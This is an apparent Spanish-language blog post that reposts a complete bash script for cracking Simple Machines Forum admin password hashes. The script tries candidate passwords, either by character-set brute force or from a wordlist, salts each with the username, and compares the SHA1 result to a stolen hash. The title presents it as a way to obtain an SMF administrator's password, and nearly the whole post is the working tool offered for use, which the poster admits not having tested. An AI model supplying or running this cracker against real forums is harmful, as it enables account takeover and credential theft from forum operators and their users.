Brute Force For SMF [ Fuerza Bruta Para SMF ] [ Script Para Sacar Pass de Admin en SMF ]

No lo e probado y muchas ganas no tengo pero tal vez un dia si que lo haga para ver si funciona, tampoco e leido bien el code, pero la opción de de hacer un ataque de fuerza bruta o uno de diccionario.

#!/usr/bin/env bash
# Simple Machines Forum Cracker V1.0
# coded By 0x90 2009
# 0x90[at]bsdmail.org
# This small tool will bruteForce "Simple Machines Forum" SHA1 hash
# tested on Fedora Linux
#
#    I do not take any reponsibilty for what you do with this tool 
#    Hopefully it will make your life easier rather then making other 
#    peoples lives more difficult!
##############################
#  ___        ___   ___  
# / _ \      / _ \ / _ \ 
#| | | |_  _| (_) | | | |
#| | | \ \/ /\__, | | | |
#| |_| |>  <   / /| |_| |
# \___//_/\_\ /_/  \___/ 
##############################  

echo ".:: Simple Machines Forum Cracker, Coded By 0x90 ::."
echo -n "Enter SMF SHA1 Hash: "
read hash
if [ -z "$hash" ] || [ "${#hash}" != "40" ]; then
echo "Error: please Enter a valid SHA1 hash"
exit
	fi
echo
echo -n "Enter SMF UserName: "
read username

echo -n "Select BruteForce Method:
1: Random BruteForce
2: Dictionary BruteForce
Enter your choise 1 or 2: "
read choise
if [ -z "$choise" ] || [ "$choise" != "1" ] && [ "$choise" != "2" ]; then
echo "Error: please choise between 1 or 2"
exit 1
	fi
#########################
# Random BruteForce
#########################

if [ "$choise" == "1" ]; then
echo "use Random method to crack"
echo "trying to bruteforce SMF SHA1 hash ..."
	
echo -n "enter min lengh: "
read minlen
echo -n "enter max lengh: "
read maxlen

echo -n "Select bruteForce mode:
all, alnum, lower, upper, digit, alpha, symbols
> "
read mode

if [ "$mode" = "all" ]; then
char="a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 0 1 2 3 4 5 6 7 8 9 ! # \$ % & \' ( ) \* + , - . / : ; & < = > ? @ [ \\ ] ^ _ { | } ~"
	fi
if [ "$mode" = "alnum" ]; then
char="a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 0 1 2 3 4 5 6 7 8 9"
	fi
if [ "$mode" = "alpha" ]; then
char="a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9"
	fi
if [ "$mode" = "lower" ]; then
char="a b c d e f g h i j k l m n o p q r s t u v w x y z"
	fi
if [ "$mode" = "upper" ]; then
char="A B C D E F G H I J K L M N O P Q R S T U V W X Y Z"
	fi
if [ "$mode" = "digit" ]; then
char="0 1 2 3 4 5 6 7 8 9"
	fi
if [ "$mode" = "symbols" ]; then
char="! # \$ % & \' ( ) \* + , - . / : ; & < = > ? @ [ \\ ] ^ _ { | } ~"
    fi


bf(){
        for c in $char ; do

                nc=$[$nc+1]
                ch[$nc]=$c
        done
        for x in `seq 1 $[$maxlen+1]` ; do

                if [ $minlen -ge $x ] ; then
                        ci[$x]=1
                else
                        ci[$x]=0
                fi
        done
        for clen in `seq $minlen $maxlen` ; do

                while [ ${ci[$[$clen+1]]} -ne 1 ] ; do
                        wrd=""
                        for x in `seq $clen -1 1` ; do
                                wrd=$wrd${ch[${ci[$x]}]}
                        done

		
smf_bf=`echo -n "$username$wrd" | sha1sum | awk '{ print $1 }'`

echo "$wrd: hash: $smf_bf"
if [ "$smf_bf" == "$hash" ]; then
echo
echo "Cracked, smf SHA1 password is: $wrd"
	exit 0
	fi
                        ci[1]=$[${ci[1]}+1]
                        for x in `seq 1 $clen`; do
                                if [ ${ci[$x]} -gt $nc ] ; then
                                        ci[$x]=1
                                        ci[$[$x+1]]=$[${ci[$[$x+1]]}+1]
                                fi
                        done
                done
        done
}

bf



fi
#########################
# Dictionary BruteForce
#########################
# Cain&Abel wordlist http://www.md5this.com/Wordlist.zip
# dont forget to convert the wordlist to Unix file format
# dos2unix Wordlist.txt
if [ "$choise" == "2" ]; then
echo "use dictionary method to crack"
echo -n "Enter dictionary name: "
read dic
echo "trying to bruteforce SMF SHA1 hash ..."
	
n=`cat $dic | wc -l`

echo "we have $n password to try"
for (( i=1; i <= $n; i++));
	do
pass=`sed -n "$i"p $dic`
smf_bf=`echo -n "$username$pass" | sha1sum | awk '{ print $1 }'`

echo "$i: hash: $smf_bf"

if [ "$smf_bf" == "$hash" ]; then
echo
echo "Cracked, SMF SHA1 password is: $pass"
	exit 0
	fi
	done
fi
	exit

Nos vemos


Una respuesta a «Brute Force For SMF [ Fuerza Bruta Para SMF ] [ Script Para Sacar Pass de Admin en SMF ]»

Los comentarios están cerrados.